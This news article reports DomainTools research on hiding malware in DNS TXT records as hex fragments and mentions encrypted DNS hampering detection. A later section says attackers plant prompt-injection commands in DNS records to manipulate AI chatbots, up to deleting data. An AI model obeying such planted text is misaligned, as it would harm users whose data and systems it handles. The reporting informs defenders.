Technology

Revealed: Hackers Exploit DNS to Deliver Malware Undetected!

2025-07-17

Author: Ming

The Ingenious New Tactic of Cybercriminals

In a shocking turn of events, cybercriminals are employing cunning strategies to evade detection, and their latest method involves hijacking the domain name system (DNS). What was once a reliable system for linking domain names to IP addresses has morphed into an unorthodox repository for malware.

How They Do It: The Sneaky Process Uncovered

Researchers from DomainTools unveiled a mind-boggling trick where malicious binary files, such as Joke Screenmate—a notorious form of nuisance malware—are cleverly concealed within DNS TXT records. This type of malware is notorious for wreaking havoc on computers, delivering everything from fake alerts to crippling slowdowns.

A Simple yet Effective Trick

Ars Technica explains that the process is deceptively straightforward: the malware file is converted into a hexadecimal format, split into fragments, and dispersed across the TXT records of various subdomains. These fragments can be pieced back together through regular DNS requests and restored to their original binary form. The genius of this method lies in the fact that DNS traffic is seldom scrutinized by conventional security measures, allowing these operations to fly under the radar.

Encryption Complicates Detection

Things get even trickier with the rise of encrypted DNS requests through protocols like DOH (DNS over HTTPS) and DOT (DNS over TLS). These technologies cloak DNS traffic, making it nearly impossible for network administrators and security tools to analyze the request content. As Ian Campbell from DomainTools notes, even companies with their own DNS resolvers find it challenging to differentiate between legitimate and suspicious requests.

Beyond Simple Malware: A Broader Threat

The researchers have also found that this method has a broader application: they discovered PowerShell scripts used as stagers for additional malware, likely orchestrated within a Covenant C2 command structure. These stagers pull their malicious payload from other domains and only spring into action following the execution of a local script—all transported via TXT records.

A Disturbing Trend in AI Manipulation

Perhaps most alarming is the discovery that DNS records can be used for prompt injections targeting AI chatbots. By embedding pre-written commands as text in DNS records, hackers can tamper with how AI systems understand and process data. This manipulation could range from benign prompts to threatening commands like deleting critical data.

Conclusion: DNS as a New Threat Front

This jaw-dropping case proves that DNS is no longer just a functional protocol; it has become a fertile ground for data theft, malware distribution, and system manipulation. As long as we lag in monitoring DNS traffic effectively, cybercriminals will continue to exploit this blind spot, posing a significant threat to digital security.